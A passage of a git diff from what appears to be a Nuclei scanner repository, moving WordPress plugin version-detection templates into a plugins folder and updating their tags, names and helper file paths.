tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/readme.txt" payloads: - last_version: wordpress-easy-wp-smtp.txt + last_version: helpers/wordpress/plugins/easy-wp-smtp.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-elementor.yaml b/technologies/wordpress/plugins/elementor.yaml similarity index 86% rename from technologies/wordpress/wordpress-elementor.yaml rename to technologies/wordpress/plugins/elementor.yaml index 06133fb385..86162e919f 100644 --- a/technologies/wordpress/wordpress-elementor.yaml +++ b/technologies/wordpress/plugins/elementor.yaml @@ -1,7 +1,7 @@ id: wordpress-elementor info: - name: "Elementor Website Builder Detection" + name: Elementor Website Builder Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" payloads: - last_version: wordpress-elementor.txt + last_version: helpers/wordpress/plugins/elementor.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-elementskit-lite.yaml b/technologies/wordpress/plugins/elementskit-lite.yaml similarity index 80% rename from technologies/wordpress/wordpress-elementskit-lite.yaml rename to technologies/wordpress/plugins/elementskit-lite.yaml index 899e10b747..e7afec416c 100644 --- a/technologies/wordpress/wordpress-elementskit-lite.yaml +++ b/technologies/wordpress/plugins/elementskit-lite.yaml @@ -1,7 +1,7 @@ id: wordpress-elementskit-lite info: - name: "ElementsKit Elementor addons (Header Footer Builder, Mega Menu Builder, Free Elementor Widgets & Elementor Templates Library) Detection" + name: ElementsKit Elementor addons (Header Footer Builder, Mega Menu Builder, Free Widgets & Templates Library) Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/elementskit-lite/readme.txt" payloads: - last_version: wordpress-elementskit-lite.txt + last_version: helpers/wordpress/plugins/elementskit-lite.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-enable-media-replace.yaml b/technologies/wordpress/plugins/enable-media-replace.yaml similarity index 87% rename from technologies/wordpress/wordpress-enable-media-replace.yaml rename to technologies/wordpress/plugins/enable-media-replace.yaml index 2fcccda7da..2b740a3bc5 100644 --- a/technologies/wordpress/wordpress-enable-media-replace.yaml +++ b/technologies/wordpress/plugins/enable-media-replace.yaml @@ -1,7 +1,7 @@ id: wordpress-enable-media-replace info: - name: "Enable Media Replace Detection" + name: Enable Media Replace Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/enable-media-replace/readme.txt" payloads: - last_version: wordpress-enable-media-replace.txt + last_version: helpers/wordpress/plugins/enable-media-replace.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-envato-elements.yaml b/technologies/wordpress/plugins/envato-elements.yaml similarity index 84% rename from technologies/wordpress/wordpress-envato-elements.yaml rename to technologies/wordpress/plugins/envato-elements.yaml index 7f7525019a..de910dccc9 100644 --- a/technologies/wordpress/wordpress-envato-elements.yaml +++ b/technologies/wordpress/plugins/envato-elements.yaml @@ -1,7 +1,7 @@ id: wordpress-envato-elements info: - name: "Envato Elements – Photos & Elementor Templates Detection" + name: Envato Elements – Photos & Elementor Templates Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/envato-elements/readme.txt" payloads: - last_version: wordpress-envato-elements.txt + last_version: helpers/wordpress/plugins/envato-elements.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml b/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml similarity index 85% rename from technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml rename to technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 4c87efbb46..2d278cd69f 100644 --- a/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml +++ b/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -1,7 +1,7 @@ id: wordpress-essential-addons-for-elementor-lite info: - name: "Essential Addons for Elementor Detection" + name: Essential Addons for Elementor Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" payloads: - last_version: wordpress-essential-addons-for-elementor-lite.txt + last_version: helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-ewww-image-optimizer.yaml b/technologies/wordpress/plugins/ewww-image-optimizer.yaml similarity index 86% rename from technologies/wordpress/wordpress-ewww-image-optimizer.yaml rename to technologies/wordpress/plugins/ewww-image-optimizer.yaml index c1d4e39281..e80b2fcda2 100644 --- a/technologies/wordpress/wordpress-ewww-image-optimizer.yaml +++ b/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -1,7 +1,7 @@ id: wordpress-ewww-image-optimizer info: - name: "EWWW Image Optimizer Detection" + name: EWWW Image Optimizer Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/ewww-image-optimizer/readme.txt" payloads: - last_version: wordpress-ewww-image-optimizer.txt + last_version: helpers/wordpress/plugins/ewww-image-optimizer.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml b/technologies/wordpress/plugins/facebook-for-woocommerce.yaml similarity index 86% rename from technologies/wordpress/wordpress-facebook-for-woocommerce.yaml rename to technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 3725b58343..e5c10a19e8 100644 --- a/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml +++ b/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -1,7 +1,7 @@ id: wordpress-facebook-for-woocommerce info: - name: "Facebook for WooCommerce Detection" + name: Facebook for WooCommerce Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/facebook-for-woocommerce/readme.txt" payloads: - last_version: wordpress-facebook-for-woocommerce.txt + last_version: helpers/wordpress/plugins/facebook-for-woocommerce.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml b/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml similarity index 86% rename from technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml rename to technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index dd18b31638..51fb053663 100644 --- a/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml +++ b/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -1,7 +1,7 @@ id: wordpress-favicon-by-realfavicongenerator info: - name: "Favicon by RealFaviconGenerator Detection" + name: Favicon by RealFaviconGenerator Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/favicon-by-realfavicongenerator/readme.txt" payloads: - last_version: wordpress-favicon-by-realfavicongenerator.txt + last_version: helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-flamingo.yaml b/technologies/wordpress/plugins/flamingo.yaml similarity index 88% rename from technologies/wordpress/wordpress-flamingo.yaml rename to technologies/wordpress/plugins/flamingo.yaml index 3739ee8366..569f038915 100644 --- a/technologies/wordpress/wordpress-flamingo.yaml +++ b/technologies/wordpress/plugins/flamingo.yaml @@ -1,7 +1,7 @@ id: wordpress-flamingo info: - name: "Flamingo Detection" + name: Flamingo Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/flamingo/readme.txt" payloads: - last_version: wordpress-flamingo.txt + last_version: helpers/wordpress/plugins/flamingo.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-fluentform.yaml b/technologies/wordpress/plugins/fluentform.yaml similarity index 82% rename from technologies/wordpress/wordpress-fluentform.yaml rename to technologies/wordpress/plugins/fluentform.yaml index 6d06697fec..41a657d4db 100644 --- a/technologies/wordpress/wordpress-fluentform.yaml +++ b/technologies/wordpress/plugins/fluentform.yaml @@ -1,7 +1,7 @@ id: wordpress-fluentform info: - name: "Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms Detection" + name: Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" payloads: - last_version: wordpress-fluentform.txt + last_version: helpers/wordpress/plugins/fluentform.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-font-awesome.yaml b/technologies/wordpress/plugins/font-awesome.yaml similarity index 88% rename from technologies/wordpress/wordpress-font-awesome.yaml rename to technologies/wordpress/plugins/font-awesome.yaml index bc1d6b2e8d..751846c1ec 100644 --- a/technologies/wordpress/wordpress-font-awesome.yaml +++ b/technologies/wordpress/plugins/font-awesome.yaml @@ -1,7 +1,7 @@ id: wordpress-font-awesome info: - name: "Font Awesome Detection" + name: Font Awesome Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/font-awesome/readme.txt" payloads: - last_version: wordpress-font-awesome.txt + last_version: helpers/wordpress/plugins/font-awesome.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml b/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml similarity index 86% rename from technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml rename to technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 9072dba0a9..769ce26fe6 100644 --- a/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml +++ b/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -1,7 +1,7 @@ id: wordpress-force-regenerate-thumbnails info: - name: "Force Regenerate Thumbnails Detection" + name: Force Regenerate Thumbnails Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/force-regenerate-thumbnails/readme.txt" payloads: - last_version: wordpress-force-regenerate-thumbnails.txt + last_version: helpers/wordpress/plugins/force-regenerate-thumbnails.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-formidable.yaml b/technologies/wordpress/plugins/formidable.yaml similarity index 83% rename from technologies/wordpress/wordpress-formidable.yaml rename to technologies/wordpress/plugins/formidable.yaml index ce3ecf97e0..e3660caae4 100644 --- a/technologies/wordpress/wordpress-formidable.yaml +++ b/technologies/wordpress/plugins/formidable.yaml @@ -1,7 +1,7 @@ id: wordpress-formidable info: - name: "Formidable Forms – Contact Form, Survey, Quiz, Calculator & Custom Form Builder Detection" + name: Formidable Forms – Contact Form, Survey, Quiz, Calculator & Custom Form Builder Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/formidable/readme.txt" payloads: - last_version: wordpress-formidable.txt + last_version: helpers/wordpress/plugins/formidable.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-forminator.yaml b/technologies/wordpress/plugins/forminator.yaml similarity index 84% rename from technologies/wordpress/wordpress-forminator.yaml rename to technologies/wordpress/plugins/forminator.yaml index 973447fc9e..5c511e7f44 100644 --- a/technologies/wordpress/wordpress-forminator.yaml +++ b/technologies/wordpress/plugins/forminator.yaml @@ -1,7 +1,7 @@ id: wordpress-forminator info: - name: "Forminator – Contact Form, Payment Form & Custom Form Builder Detection" + name: Forminator – Contact Form, Payment Form & Custom Form Builder Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt" payloads: - last_version: wordpress-forminator.txt + last_version: helpers/wordpress/plugins/forminator.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-ga-google-analytics.yaml b/technologies/wordpress/plugins/ga-google-analytics.yaml similarity index 86% rename from technologies/wordpress/wordpress-ga-google-analytics.yaml rename to technologies/wordpress/plugins/ga-google-analytics.yaml index dbd8126d73..21dfc65c47 100644 --- a/technologies/wordpress/wordpress-ga-google-analytics.yaml +++ b/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -1,7 +1,7 @@ id: wordpress-ga-google-analytics info: - name: "GA Google Analytics Detection" + name: GA Google Analytics Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/ga-google-analytics/readme.txt" payloads: - last_version: wordpress-ga-google-analytics.txt + last_version: helpers/wordpress/plugins/ga-google-analytics.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml b/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml similarity index 82% rename from technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml rename to technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 682e5e7aba..6388a0ea1f 100644 --- a/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml +++ b/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -1,7 +1,7 @@ id: wordpress-google-analytics-dashboard-for-wp info: - name: "ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin) Detection" + name: ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin) Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/google-analytics-dashboard-for-wp/readme.txt" payloads: - last_version: wordpress-google-analytics-dashboard-for-wp.txt + last_version: helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml b/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml similarity index 82% rename from technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml rename to technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 293c4a472f..692a3c20dd 100644 --- a/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml +++ b/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -1,7 +1,7 @@ id: wordpress-google-analytics-for-wordpress info: - name: "MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy) Detection" + name: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy) Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/google-analytics-for-wordpress/readme.txt" payloads: - last_version: wordpress-google-analytics-for-wordpress.txt + last_version: helpers/wordpress/plugins/google-analytics-for-wordpress.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-google-listings-and-ads.yaml b/technologies/wordpress/plugins/google-listings-and-ads.yaml similarity index 87% rename from technologies/wordpress/wordpress-google-listings-and-ads.yaml rename to technologies/wordpress/plugins/google-listings-and-ads.yaml index 99ca945a13..00b3a426f9 100644 --- a/technologies/wordpress/wordpress-google-listings-and-ads.yaml +++ b/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -1,7 +1,7 @@ id: wordpress-google-listings-and-ads info: - name: "Google Listings & Ads Detection" + name: Google Listings & Ads Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/google-listings-and-ads/readme.txt" payloads: - last_version: wordpress-google-listings-and-ads.txt + last_version: helpers/wordpress/plugins/google-listings-and-ads.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-google-site-kit.yaml b/technologies/wordpress/plugins/google-site-kit.yaml similarity index 83% rename from technologies/wordpress/wordpress-google-site-kit.yaml rename to technologies/wordpress/plugins/google-site-kit.yaml index dba19beb77..99473eae02 100644 --- a/technologies/wordpress/wordpress-google-site-kit.yaml +++ b/technologies/wordpress/plugins/google-site-kit.yaml @@ -1,7 +1,7 @@ id: wordpress-google-site-kit info: - name: "Site Kit by Google – Analytics, Search Console, AdSense, Speed Detection" + name: Site Kit by Google – Analytics, Search Console, AdSense, Speed Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/google-site-kit/readme.txt" payloads: - last_version: wordpress-google-site-kit.txt + last_version: helpers/wordpress/plugins/google-site-kit.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-google-sitemap-generator.yaml b/technologies/wordpress/plugins/google-sitemap-generator.yaml similarity index 87% rename from technologies/wordpress/wordpress-google-sitemap-generator.yaml rename to technologies/wordpress/plugins/google-sitemap-generator.yaml index e9ca057c10..10b3719178 100644 --- a/technologies/wordpress/wordpress-google-sitemap-generator.yaml +++ b/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -1,7 +1,7 @@ id: wordpress-google-sitemap-generator info: - name: "XML Sitemaps Detection" + name: XML Sitemaps Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/google-sitemap-generator/readme.txt" payloads: - last_version: wordpress-google-sitemap-generator.txt + last_version: helpers/wordpress/plugins/google-sitemap-generator.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-gtranslate.yaml b/technologies/wordpress/plugins/gtranslate.yaml similarity index 86% rename from technologies/wordpress/wordpress-gtranslate.yaml rename to technologies/wordpress/plugins/gtranslate.yaml index db237d93fb..00ab15d4ed 100644 --- a/technologies/wordpress/wordpress-gtranslate.yaml +++ b/technologies/wordpress/plugins/gtranslate.yaml @@ -1,7 +1,7 @@ id: wordpress-gtranslate info: - name: "Translate WordPress with GTranslate Detection" + name: Translate WordPress with GTranslate Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/gtranslate/readme.txt" payloads: - last_version: wordpress-gtranslate.txt + last_version: helpers/wordpress/plugins/gtranslate.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-gutenberg.yaml b/technologies/wordpress/plugins/gutenberg.yaml similarity index 88% rename from technologies/wordpress/wordpress-gutenberg.yaml rename to technologies/wordpress/plugins/gutenberg.yaml index 2bf36e67df..7d4c2bc22d 100644 --- a/technologies/wordpress/wordpress-gutenberg.yaml +++ b/technologies/wordpress/plugins/gutenberg.yaml @@ -1,7 +1,7 @@ id: wordpress-gutenberg info: - name: "Gutenberg Detection" + name: Gutenberg Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/gutenberg/readme.txt" payloads: - last_version: wordpress-gutenberg.txt + last_version: helpers/wordpress/plugins/gutenberg.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-happy-elementor-addons.yaml b/technologies/wordpress/plugins/happy-elementor-addons.yaml similarity index 86% rename from technologies/wordpress/wordpress-happy-elementor-addons.yaml rename to technologies/wordpress/plugins/happy-elementor-addons.yaml index f96f1b00b2..92de456c5d 100644 --- a/technologies/wordpress/wordpress-happy-elementor-addons.yaml +++ b/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -1,7 +1,7 @@ id: wordpress-happy-elementor-addons info: - name: "Happy Addons for Elementor Detection" + name: Happy Addons for Elementor Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/happy-elementor-addons/readme.txt" payloads: - last_version: wordpress-happy-elementor-addons.txt + last_version: helpers/wordpress/plugins/happy-elementor-addons.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-header-and-footer-scripts.yaml b/technologies/wordpress/plugins/header-and-footer-scripts.yaml similarity index 87% rename from technologies/wordpress/wordpress-header-and-footer-scripts.yaml rename to technologies/wordpress/plugins/header-and-footer-scripts.yaml index 511f6f53bd..b66950eeb6 100644 --- a/technologies/wordpress/wordpress-header-and-footer-scripts.yaml +++ b/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -1,7 +1,7 @@ id: wordpress-header-and-footer-scripts info: - name: "Header and Footer Scripts Detection" + name: Header and Footer Scripts Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/header-and-footer-scripts/readme.txt" payloads: - last_version: wordpress-header-and-footer-scripts.txt + last_version: helpers/wordpress/plugins/header-and-footer-scripts.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-header-footer-code-manager.yaml b/technologies/wordpress/plugins/header-footer-code-manager.yaml similarity index 86% rename from technologies/wordpress/wordpress-header-footer-code-manager.yaml rename to technologies/wordpress/plugins/header-footer-code-manager.yaml index cf69aa201d..1c1e4ffc9d 100644 --- a/technologies/wordpress/wordpress-header-footer-code-manager.yaml +++ b/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -1,7 +1,7 @@ id: wordpress-header-footer-code-manager info: - name: "Header Footer Code Manager Detection" + name: Header Footer Code Manager Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/header-footer-code-manager/readme.txt" payloads: - last_version: wordpress-header-footer-code-manager.txt + last_version: helpers/wordpress/plugins/header-footer-code-manager.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-header-footer-elementor.yaml b/technologies/wordpress/plugins/header-footer-elementor.yaml similarity index 85% rename from technologies/wordpress/wordpress-header-footer-elementor.yaml rename to technologies/wordpress/plugins/header-footer-elementor.yaml index ce5177577b..6c2a825366 100644 --- a/technologies/wordpress/wordpress-header-footer-elementor.yaml +++ b/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -1,7 +1,7 @@ id: wordpress-header-footer-elementor info: - name: "Elementor Header & Footer Builder Detection" + name: Elementor Header & Footer Builder Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/header-footer-elementor/readme.txt" payloads: - last_version: wordpress-header-footer-elementor.txt + last_version: helpers/wordpress/plugins/header-footer-elementor.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-header-footer.yaml b/technologies/wordpress/plugins/header-footer.yaml similarity index 86% rename from technologies/wordpress/wordpress-header-footer.yaml rename to technologies/wordpress/plugins/header-footer.yaml index 638a713ff3..ee12dea339 100644 --- a/technologies/wordpress/wordpress-header-footer.yaml +++ b/technologies/wordpress/plugins/header-footer.yaml @@ -1,7 +1,7 @@ id: wordpress-header-footer info: - name: "Head, Footer and Post Injections Detection" + name: Head, Footer and Post Injections Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/header-footer/readme.txt" payloads: - last_version: wordpress-header-footer.txt + last_version: helpers/wordpress/plugins/header-footer.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-health-check.yaml b/technologies/wordpress/plugins/health-check.yaml similarity index 86% rename from technologies/wordpress/wordpress-health-check.yaml rename to technologies/wordpress/plugins/health-check.yaml index 3e966a485d..f5e33024d1 100644 --- a/technologies/wordpress/wordpress-health-check.yaml +++ b/technologies/wordpress/plugins/health-check.yaml @@ -1,7 +1,7 @@ id: wordpress-health-check info: - name: "Health Check & Troubleshooting Detection" + name: Health Check & Troubleshooting Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/health-check/readme.txt" payloads: - last_version: 